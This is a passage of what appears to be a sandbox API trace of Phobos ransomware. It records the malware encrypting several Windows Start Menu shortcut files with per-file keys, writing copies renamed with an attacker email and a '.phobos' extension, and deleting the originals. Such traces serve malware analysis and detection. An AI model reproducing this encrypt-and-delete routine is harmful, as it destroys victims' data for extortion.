menu\\programs\\accessories\\wordpad.lnk")) returned 1 [0176.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.853] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.854] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1242) returned 1 [0176.854] CloseHandle (hObject=0x194) returned 1 [0176.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk")) returned 0x20 [0176.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.854] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.854] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.854] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.854] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4da, lpOverlapped=0x0) returned 1 [0176.858] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.858] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0176.859] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.859] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.859] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.859] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.859] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.859] CloseHandle (hObject=0x194) returned 1 [0176.859] CloseHandle (hObject=0x158) returned 1 [0176.877] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\component services.lnk")) returned 1 [0176.878] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.878] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.879] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1270) returned 1 [0176.879] CloseHandle (hObject=0x148) returned 1 [0176.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk")) returned 0x20 [0176.879] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.879] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.879] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.879] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.879] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0176.880] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.880] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f6, lpOverlapped=0x0) returned 1 [0176.892] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0176.892] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0176.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0176.893] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.893] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.893] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.893] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.893] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.893] CloseHandle (hObject=0x148) returned 1 [0176.893] CloseHandle (hObject=0x17c) returned 1 [0176.893] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\data sources (odbc).lnk")) returned 1 [0176.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.895] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1298) returned 1 [0176.895] CloseHandle (hObject=0x17c) returned 1 [0176.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk")) returned 0x20 [0176.896] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.896] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.896] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0176.897] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.897] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x512, lpOverlapped=0x0) returned 1 [0176.915] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520, dwBufLen=0x520 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x520) returned 1 [0176.915] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x520, lpOverlapped=0x0) returned 1 [0176.916] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0176.916] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.916] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.916] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.916] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.916] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.916] CloseHandle (hObject=0x17c) returned 1 [0176.916] CloseHandle (hObject=0x148) returned 1 [0176.916] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Event Viewer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\event viewer.lnk")) returned 1 [0176.922] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.922] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.923] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1274) returned 1 [0176.923] CloseHandle (hObject=0x148) returned 1 [0176.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk")) returned 0x20 [0176.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.923] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.923] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.923] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.923] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0176.924] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.924] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4fa, lpOverlapped=0x0) returned 1 [0176.937] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0176.937] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0176.938] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0176.938] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.938] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.938] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.938] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.938] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.938] CloseHandle (hObject=0x148) returned 1 [0176.938] CloseHandle (hObject=0x17c) returned 1 [0176.938] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\iSCSI Initiator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\iscsi initiator.lnk")) returned 1 [0176.940] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.940] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1268) returned 1 [0176.940] CloseHandle (hObject=0x17c) returned 1 [0176.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk")) returned 0x20 [0176.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.941] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.941] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.941] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0176.941] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.941] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f4, lpOverlapped=0x0) returned 1 [0176.981] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0176.981] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0176.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.982] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.982] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0176.982] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.982] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0176.982] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.982] CloseHandle (hObject=0x17c) returned 1 [0176.983] CloseHandle (hObject=0x148) returned 1 [0176.983] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk")) returned 1 [0176.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.984] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.984] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1262) returned 1 [0176.984] CloseHandle (hObject=0x148) returned 1 [0176.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk")) returned 0x20 [0176.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.984] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 